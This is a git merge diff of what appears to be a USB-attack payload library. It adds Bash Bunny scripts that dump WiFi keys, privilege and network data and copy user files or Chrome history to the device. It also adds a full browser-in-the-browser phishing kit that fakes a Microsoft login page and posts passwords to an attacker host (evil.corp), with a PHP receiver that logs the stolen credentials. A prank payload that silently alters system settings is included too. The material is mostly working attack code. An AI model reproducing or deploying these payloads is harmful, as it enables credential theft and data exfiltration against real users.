Merge branch 'hak5:master' into master

payloads/library/credentials/SamDumpBunny/README.md

@@ -15,7 +15,10 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
 
 2. Unzip the exfiltrated zip file onto your machine.
 
-3. Use a tool like samdump2 on your machine to extract the users hashes.
+3. Use a tool like samdump2 or pypykatz on your machine to extract the users hashes.
 	> `samdump2 BunnySys BunnySam`
+	or  `pypykatz registry BunnySys --sam BunnySam`
+	
+	**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
 
-![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
+![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

payloads/library/exfiltration/OooohThatsHandy/Read-Me

@@ -0,0 +1,17 @@
+OooohThatsHandy
+Extract useful information such as nmap scan results, wifi keys, Local DNS Cache, User privilieges and group memberships, user folder contents with images and documents being transferred
+Designed for and tested on Win 10
+@PeteDavis91 - Follow me on Twitter! 
+v0.4
+Exfiltration
+Attackmodes - HID Storage RNDIS_ETHERNET
+Credit to Hak5 & Darren for making amaizng content and products for years! 
+Thanks to 0iphori3 and Cribbit for answering my annoying questions all the time on the discord!  
+
+
+LED CODES:
+SOLID BLUE LED:			Setting Up
+FAST BLUE LED: 			Creating Data
+VERY FAST BLUE LED:		Exporting Data Created and Discovered
+SOLID WHITE LED:		Cleaning up and finalizing
+FINISH GREEN LED: 		Safe to remove your Bash Bunny - Enjoy the data 

payloads/library/exfiltration/OooohThatsHandy/payload

@@ -0,0 +1,63 @@
+REM Title:         		OooohThatsHandy
+REM Description:   		Extract useful information such as nmap, wifi keys, DNS Cache, User privilieges and group memberships, user folder contents with images and documents, shared folders 
+REM OS:			   		Designed for Win 10
+REM Author:        		Twitter @PeteDavis91
+REM Version:       		0.6
+REM Category:      		Exfiltration
+REM Attackmodes:   		HID Storage RNDIS_ETHERNET
+REM Credz:		   		Hak5 Darren obviously, 0iphori3 and Cribbit 
+
+
+REM LED CODES:
+REM SOLID BLUE LED:			Setting Up
+REM FAST BLUE LED: 			Creating Data
+REM VERY FAST BLUE LED:		Exporting Data Created and Discovered
+REM SOLID WHITE LED:		Cleaning up and finalizing
+REM FINISH GREEN LED: 		Safe to remove your Bash Bunny - Enjoy the data 
+
+REM OPTIONS
+REM This option is used for the transferring the user profile onto the BashBunny. Set in milliseconds, the longer you can wait the more data you will get. 
+NoTimeToHangAround=30000
+
+REM This section sets up the BashBunny
+LED B SOLID
+Q DELAY 1000
+DUCKY_LANG gb
+ATTACKMODE HID STORAGE RNDIS_ETHERNET
+Q DELAY 1000
+GET TARGET_IP
+Q DELAY 500
+
+REM This section runs commands to create logs and data for export
+LED B FAST
+Q DELAY 500
+mkdir /root/hostsideloot
+Q DELAY 1000
+nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/nmap.txt
+Q DELAY 1000
+RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\WiFi.txt & whoami /all > %TEMP%\LOOK\UserGroupsPrivs.txt'
+Q DELAY 1000
+RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\DNSCache.txt & dsregcmd /status > %TEMP%\LOOK\AzureInfo.txt & net share > %TEMP%\LOOK\Shares.txt' 
+Q DELAY 1000
+RUN WIN "powershell -W Hidden -c \$s = gwmi win32_service; echo \$s.pathname | Out-File -FilePath %TEMP%\\LOOK\\CheckForUnquoted.txt"
+
+
+REM This section exports the previously created data as well as the running user profile with images and documents 
+LED B VERYFAST
+Q DELAY 50
+RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\"
+Q DELAY 1000
+RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\ /E /W:1 /R:1 /NP /MT /XD \"\$env:APPDATA\" \"\$env:LOCALAPPDATA\" \"\$env:USERPROFILE\\AppData\""
+Q DELAY $NoTimeToHangAround
+
+
+REM Cleanup and finalizing
+LED W SOLID
+mv /root/hostsideloot/nmap.txt /root/udisk/loot/
+RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK' 
+rmdir /root/hostsideloot
+
+
+ATTACKMODE FINISH
+LED G FINISH 
+

payloads/library/exfiltration/simple-usb-extractor/x.cmd

@@ -33,5 +33,9 @@ xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
 xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
 )
 
+if Exist %USERPROFILE%\AppData\Local\Google\Chrome\ (
+xcopy /C /Q /G /Y "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History" %dst% >>nul
+)
+
 @cls
 @exit

payloads/library/phishing/windows_browser-in-the-browser/README.md

@@ -0,0 +1,95 @@
+# "Microsoft Windows" Browser in the Browser (BitB)
+
+- Title:         "Microsoft Windows" Browser in the Browser (BitB)
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Phishing
+
+## Description
+
+1) Hide "PowerShell" window.
+2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+4) Copies and hides the phishing folder in the current user's directory.
+5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+# Choose "dark" or "light"
+#
+readonly BITB_THEME="dark"
+
+# Title of the window
+#
+readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
+
+# URL in the address bar
+#
+readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
+
+# Content of the navigation window
+#
+readonly BITB_TEMPLATE="microsoft-account.html"
+
+# Destination of the form data
+#
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+
+
+```
+
+Example of code for the data receiver :
+```php
+<?php
+
+if (
+    $_SERVER['REQUEST_METHOD'] === 'POST'
+) {
+
+    $remote_addr = (string) $_SERVER['REMOTE_ADDR'];
+    $user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
+    $username_password = (string) implode(',', $_POST);
+
+    /*
+        touch ./aGFrNQ_loot.log
+        chown www-data:www-data ./aGFrNQ_loot.log
+    */
+    $loot = fopen('aGFrNQ_loot.log', 'a');
+    fwrite($loot, "##\n");
+    fwrite($loot, $remote_addr . "\n");
+    fwrite($loot, $user_agent . "\n");
+    fwrite($loot, $username_password . "\n");
+    fwrite($loot, "##\n");
+    fclose($loot);
+
+}
+
+http_response_code(302);
+header('Location: https://hak5.org/');
+exit;
+
+?>
+```
+
+## Screenshots
+
+>
+> Dark Theme
+>
+
+![bitb-dark](./readme_files/bitb-dark.png)
+
+>
+> Light Theme
+>
+
+![bitb-light](./readme_files/bitb-light.png)

payloads/library/phishing/windows_browser-in-the-browser/payload.ps1

@@ -0,0 +1,55 @@
+#
+# Author:       TW-D
+# Version:      1.0
+#
+
+param (
+    [string] $BITB_THEME,
+    [string] $BITB_TITLE,
+    [string] $BITB_URL,
+    [string] $BITB_TEMPLATE,
+    [string] $DROP_URL
+)
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+If ($BITB_THEME -And $BITB_TITLE -And $BITB_URL -And $BITB_TEMPLATE -And $DROP_URL) {
+
+    # Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+    #
+    (powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)
+
+    # Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+    #
+    (powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)
+
+    # Copies and hides the phishing folder in the current user's directory.
+    #
+    $random_name = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8  | % {[char] $_} ) )
+    $phishing_path = "${HOME}\${random_name}\"
+    Copy-Item -Path ".\phishing_files\" -Destination "${phishing_path}" -Recurse
+    (Get-Item "${phishing_path}" -Force).Attributes = "Hidden"
+
+    # Builds the configuration file for the phishing page.
+    #
+    "const BITB_THEME = '${BITB_THEME}';" | Out-File -FilePath "${phishing_path}TMP.js"
+    "const BITB_TITLE = '${BITB_TITLE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+    "const BITB_URL = '${BITB_URL}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+    "const BITB_TEMPLATE = '${BITB_TEMPLATE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+
+    # Updating the destination of the form data.
+    #
+    (Get-Content "${phishing_path}templates\${BITB_TEMPLATE}") -Replace "--DROP_URL--", "${DROP_URL}" | Set-Content "${phishing_path}templates\${BITB_TEMPLATE}"
+
+    # Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+    #
+    $phishing_path = ($phishing_path -Replace '[\\/]', '/')
+    & "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --app="file:///${phishing_path}index.html" --kiosk --kiosk-idle-timeout-minutes=0 --edge-kiosk-type=fullscreen --no-first-run
+
+}

payloads/library/phishing/windows_browser-in-the-browser/payload.txt

@@ -0,0 +1,103 @@
+#!/bin/bash
+#
+# Title:            "Microsoft Windows" Browser in the Browser (BitB)
+#
+# Description:     
+#                   1) Hide "PowerShell" window.
+#                   2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#                   3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#                   4) Copies and hides the phishing folder in the current user's directory.
+#                   5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+#                   6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Phishing
+# Target:           Microsoft Windows
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# NOTE
+# ===============
+# Microsoft Edge is required on the target machine.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+# Choose "dark" or "light"
+#
+readonly BITB_THEME="dark"
+
+# Title of the window
+#
+readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
+
+# URL in the address bar
+#
+readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
+
+# Content of the navigation window
+#
+readonly BITB_TEMPLATE="microsoft-account.html"
+
+# Destination of the form data
+#
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 8000
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 4000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3000
+
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -BITB_THEME \"${BITB_THEME}\" -BITB_TITLE \"${BITB_TITLE}\" -BITB_URL \"${BITB_URL}\" -BITB_TEMPLATE \"${BITB_TEMPLATE}\" -DROP_URL \"${DROP_URL}\""
+Q ENTER
+Q DELAY 3000
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/css/main.css

@@ -0,0 +1,40 @@
+#draggable {
+    font-family: "Segoe UI Light" !important;
+}
+
+#microsoft-logo {
+    height: 40px;
+}
+
+#title-text {
+    margin-left: 5px;
+}
+
+#minimize {
+    font-size: 20px;
+}
+
+#maximize {
+    font-size: 30px;
+}
+
+#container-minimize:hover, #container-maximize:hover {
+    opacity: 0.5;
+}
+
+#container-exit:hover {
+    background-color: red;
+}
+
+#exit {
+    font-size: 20px;
+}
+
+#ssl-logo {
+    height: 40px;
+}
+
+#phishing-iframe {
+    width: 100%;
+    height: 75vh;
+}

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/img/logo.svg

@@ -0,0 +1 @@
+<svg enable-background="new 0 0 2499.6 2500" viewBox="0 0 2499.6 2500" xmlns="http://www.w3.org/2000/svg"><path d="m1187.9 1187.9h-1187.9v-1187.9h1187.9z" fill="#f1511b"/><path d="m2499.6 1187.9h-1188v-1187.9h1187.9v1187.9z" fill="#80cc28"/><path d="m1187.9 2500h-1187.9v-1187.9h1187.9z" fill="#00adef"/><path d="m2499.6 2500h-1188v-1187.9h1187.9v1187.9z" fill="#fbbc09"/></svg>

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/img/ssl.svg

@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<svg width="752pt" height="752pt" version="1.1" viewBox="0 0 752 752" xmlns="http://www.w3.org/2000/svg">
+ <path d="m510.97 316.8h-12.785l-0.003906-62.512c0-56.828-46.41-103.24-103.24-103.24h-37.887c-56.828 0-103.24 46.41-103.24 103.24v62.039h-12.785c-25.574 0-45.938 20.836-45.938 45.938v192.27c0 25.574 20.836 45.938 45.938 45.938h270.41c25.574 0 45.938-20.836 45.938-45.938l0.003906-191.8c0-25.574-20.836-45.938-46.41-45.938zm-195.12-62.512c0-22.73 18.469-41.203 41.203-41.203h37.887c22.73 0 41.203 18.469 41.203 41.203v62.039h-120.29z" fill="#A6A6B2"/>
+</svg>

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/js/actions.js

@@ -0,0 +1,19 @@
+var draggable;
+draggable = document.querySelector('#draggable');
+
+$('#draggable').draggable();
+
+document.querySelector('#container-minimize').onclick = function() {
+    draggable.classList.remove('w-75');
+    draggable.classList.add('w-50');
+}
+
+document.querySelector('#container-maximize').onclick = function() {
+    draggable.classList.remove('w-50');
+    draggable.classList.add('w-75');
+}
+
+document.querySelector('#container-exit').onclick = function() {
+    draggable.style.display = 'none';
+    setTimeout(function() { location.reload();	}, 2000);
+}

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/js/dispatch.js

@@ -0,0 +1,17 @@
+var theme;
+
+switch (BITB_THEME) {
+    case 'dark':
+        theme = ' bg-dark text-white';
+        break;
+    case 'light':
+        theme = ' bg-light text-dark';
+        break;
+    default:
+        theme = ' bg-dark text-white';
+}
+
+document.querySelectorAll('.row').forEach((row) => (row.className += theme));
+document.querySelector('#title-text').innerText = BITB_TITLE;
+document.querySelector('#url-input').value = BITB_URL;
+document.querySelector('#phishing-iframe').src = ('./templates/' + BITB_TEMPLATE);

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/index.html

@@ -0,0 +1,46 @@
+<!DOCTYPE html>
+<html lang="en">
+    <head>
+        <meta charset="UTF-8" />
+        <meta name="viewport" content="width=device-width, initial-scale=1" />
+        <link rel="stylesheet" type="text/css" href="./assets/css/main.css?version=1.0.0" />
+        <link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?version=5.1.3" />
+    </head>
+    <body>
+        <main class="container w-50 mt-4 shadow" id="draggable">
+            <div class="row p-3 text-center rounded-top">
+                <div class="col-1 align-self-center">
+                    <img id="microsoft-logo" src="./assets/img/logo.svg" alt="" />
+                </div>
+                <div class="col-8 align-self-center text-start">
+                    <div class="fw-bold" id="title-text"></div>
+                </div>
+                <div class="col-1 align-self-center pt-3" id="container-minimize">
+                    <div id="minimize">&#8212;</div>
+                </div>
+                <div class="col-1 align-self-center p-3" id="container-maximize">
+                    <div id="maximize">□</div>
+                </div>
+                <div class="col-1 align-self-center p-3" id="container-exit">
+                    <div id="exit">X</div>
+                </div>
+            </div>
+            <div class="row p-3 text-center">
+                <div class="col-1 align-self-center">
+                    <img id="ssl-logo" src="./assets/img/ssl.svg" alt="" />
+                </div>
+                <div class="col-11 align-self-center">
+                    <input class="form-control" type="text" id="url-input" disabled />
+                </div>
+            </div>
+            <div>
+                <iframe id="phishing-iframe" frameBorder="0"></iframe>
+            </div>
+        </main>
+        <script type="text/javascript" src="./assets/libraries/jquery-3.6.0.min.js?version=3.6.0"></script>
+        <script type="text/javascript" src="./assets/libraries/jquery-ui.min.js?version=1.13.0"></script>
+        <script type="text/javascript" src="./assets/js/actions.js?version=1.0.0"></script>
+        <script type="text/javascript" src="./TMP.js?version=1.0.0"></script>
+        <script type="text/javascript" src="./assets/js/dispatch.js?version=1.0.0"></script>
+    </body>
+</html>

payloads/library/prank/Win_HID_BeAPest/payload.txt

@@ -0,0 +1,51 @@
+# Title:       	Be a pest using CLSID
+# Description:  Uses CLSID to open system dialogs to swap the left and right mouse button, change the region to Welsh and turn off system sounds. 
+# Author:       Cribbit
+# Version:      1.0
+# Category:     Pranks
+# Target:       Windows 10
+# Attackmodes:	HID	
+
+LED SETUP
+
+ATTACKMODE HID 
+
+# GET SWITCH_POSITION
+
+LED ATTACK
+
+QUACK DELAY 200
+# Swop Mouse buttons L <-> R 
+RUN WIN "shell:::{6C8EEC18-8D75-41B2-A177-8831D59D2D50}"
+QUACK DELAY 200
+QUACK SPACE
+QUACK DELAY 100
+QUACK ENTER
+QUACK DELAY 100
+# Set region to Welsh
+RUN WIN "shell:::{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}"
+QUACK DELAY 200
+# Walser (Switzerland)
+QUACK w
+QUACK DELAY 100
+# Welsh
+QUACK w
+QUACK DELAY 100
+QUACK ENTER
+QUACK DELAY 100
+# Turn off system sounds
+RUN WIN "shell:::{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}"
+QUACK DELAY 200
+QUACK SHIFT TAB
+QUACK DELAY 100
+QUACK RIGHTARROW
+QUACK DELAY 100
+QUACK RIGHTARROW
+QUACK DELAY 100
+QUACK TAB
+QUACK DELAY 100
+QUACK UPARROW
+QUACK DELAY 100
+QUACK ENTER
+
+LED FINISH

payloads/library/prank/Win_HID_BeAPest/readme.md

@@ -0,0 +1,25 @@
+# Be A Pest Using CLSID
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10
+- Category: General
+- Attackmode: HID
+- Extensions: Run
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Description
+Uses CLSID to open system dialogs.
+To swap the left and right mouse button. 
+Change the region to Welsh.
+And turn off system sounds.
+
+## Colours
+| Status   | Colour                        | Description                 |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP    | Magenta solid                 | Setting attack mode         |
+| ATTACK   | Yellow single blink           | Injecting Keystrokes 		 |
+| FINISHED | Green blink followed by SOLID | Injection finished          |